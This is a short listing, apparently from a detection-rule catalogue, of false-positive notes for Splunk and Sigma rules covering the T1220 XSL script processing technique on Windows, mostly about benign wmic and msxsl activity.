LoFP
/
t1220
t1220
Title
Tags
false positives are limited as legitimate applications typically do not download files or xsl using wmic. filter as needed.
t1220
endpoint
splunk
msxsl is not installed by default and is deprecated, so unlikely on most systems.
t1220
windows
sigma
since the imageload event doesn't have enough information in this case. it's better to look at the recent process creation events that spawned the wmic process and investigate the command line and parent/child processes to get more insights
t1220
windows
sigma
static format arguments - https://petri.com/command-line-wmi-part-3
t1220
windows
sigma
the command wmic os get lastboottuptime loads vbscript.dll
t1220
windows
sigma
the command wmic os get locale loads vbscript.dll
t1220
windows
sigma
wmic.exe fp depend on scripts and administrative methods used in the monitored environment.
t1220
windows
sigma
LoFP
/
t1220